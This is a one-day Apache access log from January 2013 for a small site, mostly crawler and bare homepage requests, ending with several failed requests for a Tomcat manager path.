184.72.82.95 - - [13/Jan/2013:09:16:58 +0100] "GET / HTTP/1.0" 200 1229 "-" "Nutch/Nutch-2.0 (Nutch Crawler)"
107.20.129.75 - - [13/Jan/2013:09:17:01 +0100] "GET /robots.txt HTTP/1.0" 404 315 "-" "Nutch/Nutch-2.0 (Nutch Crawler)"
107.20.129.75 - - [13/Jan/2013:09:17:01 +0100] "GET / HTTP/1.0" 200 1229 "-" "Nutch/Nutch-2.0 (Nutch Crawler)"
67.202.9.230 - - [13/Jan/2013:09:17:06 +0100] "GET /robots.txt HTTP/1.0" 404 315 "-" "Nutch/Nutch-2.0 (Nutch Crawler)"
67.202.9.230 - - [13/Jan/2013:09:17:06 +0100] "GET / HTTP/1.0" 200 1229 "-" "Nutch/Nutch-2.0 (Nutch Crawler)"
212.186.9.50 - - [13/Jan/2013:10:01:13 +0100] "GET / HTTP/1.0" 200 1229 "-" "-"
109.86.68.219 - - [13/Jan/2013:10:20:17 +0100] "GET / HTTP/1.0" 200 1229 "-" "-"
85.210.109.231 - - [13/Jan/2013:10:52:34 +0100] "GET / HTTP/1.0" 200 1229 "-" "-"
195.23.157.191 - - [13/Jan/2013:12:33:02 +0100] "GET / HTTP/1.0" 200 1229 "-" "-"
212.143.5.52 - - [13/Jan/2013:12:40:51 +0100] "GET / HTTP/1.0" 200 1229 "-" "-"
89.103.160.148 - - [13/Jan/2013:13:11:00 +0100] "GET / HTTP/1.0" 200 1229 "-" "-"
74.216.94.31 - - [13/Jan/2013:13:47:46 +0100] "GET / HTTP/1.0" 200 1229 "-" "-"
94.253.251.225 - - [13/Jan/2013:14:20:34 +0100] "GET / HTTP/1.0" 200 1229 "-" "-"
178.77.126.55 - - [13/Jan/2013:14:23:16 +0100] "GET /robots.txt HTTP/1.1" 404 320 "-" "Mozilla/5.0 (compatible; CareerBot/1.1; +http://www.career-x.de/bot.html)"
178.77.126.55 - - [13/Jan/2013:14:23:16 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CareerBot/1.1; +http://www.career-x.de/bot.html)"
85.210.109.231 - - [13/Jan/2013:15:01:05 +0100] "GET / HTTP/1.0" 200 1229 "-" "-"
65.55.213.73 - - [13/Jan/2013:16:26:07 +0100] "GET /robots.txt HTTP/1.1" 404 320 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
65.55.213.73 - - [13/Jan/2013:16:26:07 +0100] "GET / HTTP/1.1" 200 1229 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
77.253.212.61 - - [13/Jan/2013:16:26:45 +0100] "GET / HTTP/1.0" 200 1229 "-" "-"
66.249.78.97 - - [13/Jan/2013:16:45:16 +0100] "GET /robots.txt HTTP/1.1" 404 322 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.78.97 - - [13/Jan/2013:16:45:16 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
82.117.247.84 - - [13/Jan/2013:17:12:29 +0100] "GET / HTTP/1.0" 200 1229 "-" "-"
212.143.5.52 - - [13/Jan/2013:18:27:57 +0100] "GET / HTTP/1.0" 200 1229 "-" "-"
194.153.113.7 - - [13/Jan/2013:20:36:22 +0100] "HEAD / HTTP/1.1" 200 - "-" "Mozilla/5.0 (compatible; oBot/2.3.1; +http://filterdb.iss.net/crawler/)"
89.103.160.148 - - [13/Jan/2013:20:47:52 +0100] "GET / HTTP/1.0" 200 1229 "-" "-"
194.153.113.7 - - [13/Jan/2013:21:33:26 +0100] "HEAD / HTTP/1.1" 200 - "-" "Mozilla/5.0 (compatible; oBot/2.3.1; +http://filterdb.iss.net/crawler/)"
74.216.94.31 - - [13/Jan/2013:21:39:16 +0100] "GET / HTTP/1.0" 200 1229 "-" "-"
80.109.10.89 - - [13/Jan/2013:23:29:55 +0100] "GET / HTTP/1.0" 200 1229 "-" "-"
213.146.146.172 - - [13/Jan/2013:23:36:07 +0100] "GET /manager/html HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0"
213.146.146.172 - - [13/Jan/2013:23:36:08 +0100] "GET /manager/html HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0"
213.146.146.172 - - [13/Jan/2013:23:36:08 +0100] "GET /manager/html HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0"
213.146.146.172 - - [13/Jan/2013:23:36:08 +0100] "GET /manager/html HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0"
213.146.146.172 - - [13/Jan/2013:23:36:08 +0100] "GET /manager/html HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0"
213.146.146.172 - - [13/Jan/2013:23:36:08 +0100] "GET /manager/html HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0"
